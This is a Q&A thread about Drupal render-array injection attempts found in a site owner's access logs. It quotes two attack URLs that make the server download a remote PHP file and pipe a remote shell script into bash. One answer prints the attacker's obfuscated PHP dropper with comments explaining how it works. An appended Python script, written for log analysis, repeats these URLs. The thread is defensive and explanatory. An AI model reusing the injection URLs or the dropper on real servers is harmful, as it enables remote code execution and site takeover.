
In my logs I see regular attempts, a few times a day like these ones:

http://www.example.com/user/password?name[%23post_render][0]=exec&name[%23markup]=wget+https%3a%2f%2fpastebin.com%2fraw%2fPeBdUg98+--no-check-certificate+-O+wer.PHP
http://www.example.com/user/password/?name[%23post_render][]=system&name[%23markup]=wget+-O-+http://repo-linux.com/apply_patch.sh%7Cbash&name[%23type]=markup

My Drupal is patched to the latest version. Shall I worry about it? Is there something I could do to protect better?

Anders
MMT

2 Answers


I did some searching, and the closest thing I can find to what’s going on is outlined here. However, I don’t think that’s quite the same. It looks like your attacker is attempting to do command injections, one of which is pulling from pastebin, the other from GitHub. Seeing the sources that the attacker is attempting to include may give you a better idea as to what they’re trying to exploit, but keep in mind that this is malicious code. Visit and investigate at your own risk, taking proper precautions.

I don’t know how Drupal works at its core, but I would hope that a GET request like what the attacker is using (since the parameters are in the URL) wouldn’t be capable of making any of the changes the attacker is trying to implement.

I would recommend looking through some system logs to ensure that there was no access to the server, and ensure that not only the CMS (Drupal) but all of the plugins and themes are up to date as well. If you do some searching around, you may find that even an up-to-date plugin may have vulnerabilities.

SuperAdmin

Looks like the attacker tries to download the script from this website (https://pastebin.com/raw/PeBdUg98) to your server:

This is the script (it's safe to click this link):

<?php
    // Attacker's dropper as posted above, with comments added. The string
    // "eval(base64_decode('" is assembled piecemeal so a plain grep for "eval" misses it.
    $st = 'return value';                               // $st[1].$st[7].$st[8].$st[9] spells "eval"
    $cap='bas'.'e6'.'4_d'.'ec'.'ode';                   // "base64_decode"
    $c = $st[1].$st[7].$st[8].$st[9].'('.$cap.'(\'';    // $c = "eval(base64_decode('"
    if(isset($_POST['uf']) && isset($_POST['pr'])) {
        // Single-element array: key = eval(base64_decode('<uf>')), value = the regex '|.*|e'.
        $arr = array($c.$_POST['uf'].'\'))' => '|.*|e',);
        // array_walk calls $_POST['pr'](value, key, '') on that element. With pr=preg_replace
        // this is preg_replace('|.*|e', "eval(base64_decode('<uf>'))", ''): the /e modifier
        // (removed in PHP 7) runs the replacement string as PHP code, i.e. the base64 payload.
        array_walk($arr, strval($_POST['pr']), '');
    }
?>

And in the second call (to this script - it's safe to click the link) he tries to run a patch on your Drupal.

I don't think that he can get it to work - but you can mimic what he's doing on a dummy website that you'll spin up and see if it actually works.

You can check your access logs, and if all the calls come from the same IP, block it and do a reverse IP lookup to try and find more information about the attacker, and possibly report him to his ISP.

Even though it's not phishing you can also try and submit a report here: http://www.google.com/safebrowsing/report_phish/

Good job on staying on the latest version of Drupal - if you've installed plugins try to stay on their latest version as well.

Nir Alfasi
  • Thank you for your answer. I have already checked and the IPs are different every time. I wanted to block the IP as well. I also believe it's quite easy to fake an IP... – MMT Apr 22 '18 at 15:43
  • Thank you for your answer. It is very helpful! Especially having posted the attacker's script. I haven't tried the link on my website (with all the additional URL of the attacker) so that he does not see my IP address in his logs. In my logs, his access throws an error, however I don't know what he gets as an output (maybe before the error is thrown), whether he gets something. To test it I need to create another website where to place the script as the attacker, right? And then apply the complex URL on my main site, right? – MMT Apr 22 '18 at 15:51
  • The links that I posted are safe to click: they access his script indirectly through a site called anonymouse. And as for your question, you can spin up a local Drupal instance (maybe even on a VM). Then use the same URL, just replace the beginning (your domain) with 'localhost' and view this instance's log. Do not try to run or access these scripts through your website. – Nir Alfasi Apr 22 '18 at 21:53
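Both answers recommend going through the access logs. The script below is an added example for this thread (not code from any of the posters) that does that work for the request shape shown in the question: it finds requests whose query string carries a `name[#post_render][...]=<callback>` parameter next to `name[#markup]=<command>`, percent-decodes them so the callback (`exec`, `system`) and the shell command are readable, pulls out the URLs the command downloads from, and tallies source IPs and payload URLs. The log lines it runs on are constructed to mirror the two URLs in the question; the IP addresses, timestamps and status codes in them are assumptions, not the asker's real data.

```python
"""Scan an access log for the Drupal render-array style requests quoted in the
question: a `name[#post_render][...]=<callback>` parameter paired with
`name[#markup]=<command>`. Decode each hit and summarise source IPs and the
remote URLs the injected commands fetch.

Added example for this thread, not code from any of the posters. The log lines
below are constructed to mirror the two request URLs in the question."""
import re
from collections import Counter
from urllib.parse import parse_qsl

# Constructed sample lines in combined log format (not the asker's real logs).
SAMPLE_LOG = """\
203.0.113.5 - - [22/Apr/2018:10:14:02 +0000] "GET /user/password?name[%23post_render][0]=exec&name[%23markup]=wget+https%3a%2f%2fpastebin.com%2fraw%2fPeBdUg98+--no-check-certificate+-O+wer.PHP HTTP/1.1" 200 5120 "-" "python-requests/2.18.4"
198.51.100.7 - - [22/Apr/2018:11:30:45 +0000] "GET /user/password/?name[%23post_render][]=system&name[%23markup]=wget+-O-+http://repo-linux.com/apply_patch.sh%7Cbash&name[%23type]=markup HTTP/1.1" 500 1024 "-" "Mozilla/5.0"
192.0.2.9 - - [22/Apr/2018:12:00:01 +0000] "GET /user/password?name=alice HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

# Combined log format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# A form field carrying a render-array property, e.g. name[#post_render][0].
KEY_RE = re.compile(r'^(?P<field>[^\[]+)\[#(?P<prop>[a-z_]+)\]')
# URLs inside the injected shell command; stop at shell metacharacters.
URL_RE = re.compile(r'https?://[^\s|;&]+')


def decode_render_array(target):
    """Return the callback/command pair if the query string carries a
    #post_render callback, otherwise None."""
    query = target.partition('?')[2]
    callback = command = None
    # parse_qsl percent-decodes keys and values and turns '+' into spaces,
    # so %23post_render becomes #post_render and the command becomes readable.
    for key, value in parse_qsl(query, keep_blank_values=True):
        m = KEY_RE.match(key)
        if not m:
            continue
        if m.group('prop') == 'post_render':
            callback = value
        elif m.group('prop') == 'markup':
            command = value
    if callback is None:
        return None
    return {
        'callback': callback,
        'command': command,
        'urls': URL_RE.findall(command or ''),
    }


def scan_log(text):
    """Return one record per request that carries a #post_render callback."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = decode_render_array(m.group('target'))
        if decoded is None:
            continue
        hits.append({
            'ip': m.group('ip'),
            'ts': m.group('ts'),
            'status': int(m.group('status')),
            'path': m.group('target').partition('?')[0],
            **decoded,
        })
    return hits


def summarise(hits):
    """Count source IPs and payload URLs. When the IPs rotate (as the asker
    reports), the payload URLs are the steadier indicator of one campaign."""
    return {
        'ips': Counter(h['ip'] for h in hits),
        'urls': Counter(u for h in hits for u in h['urls']),
    }


if __name__ == '__main__':
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(f"{h['ts']} {h['ip']} {h['path']} -> "
              f"{h['callback']}({h['command']!r}) status={h['status']}")
    print(summarise(hits))
```

Run it over a real log with `scan_log(open('/var/log/apache2/access.log').read())` (path assumed). The `status` field records what the server answered each attempt, which is the closest the log gets to the asker's question of whether the request did anything; the summary by URL is there because the asker notes the IPs differ every time, so blocking individual addresses will not keep up.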